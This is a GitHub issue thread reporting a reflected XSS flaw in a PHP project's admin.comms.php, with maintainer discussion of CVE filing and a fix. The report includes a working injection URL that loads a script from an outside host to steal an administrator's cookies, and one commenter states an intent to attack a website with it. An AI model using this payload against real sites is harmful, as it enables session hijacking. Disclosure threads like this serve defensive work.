New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
XSS vulnerability in admin.comms.php #253
Comments
|
I don't really see how you can abuse this to get an administrators cookie? |
|
Try Firefox |
|
The use of a certain limit, but does not affect the vulnerability of the harm. I'm trying to exploit this vulnerability to attack a website. |
|
If a user opens the link in their browser the script will be executed, this is how your cookie is stolen. However this link does more than just showing an alert for demonstration purpose, this link actually downloads a script and runs it! DO NOT CLICK THE LINK |
|
Please apply for CVE number on this site. https://cveform.mitre.org/ |
|
very useful for such a small software @l33cy rather show them the fix for it ;) |
|
@l33cy we have had many security holes what were patched and never were on CVE |
|
Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow. |
|
Fixed with e63701e |
There is a reflective XSS vulnerability in the 21 line of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.
http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a



Effect in browser:
code:
Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much。
The text was updated successfully, but these errors were encountered: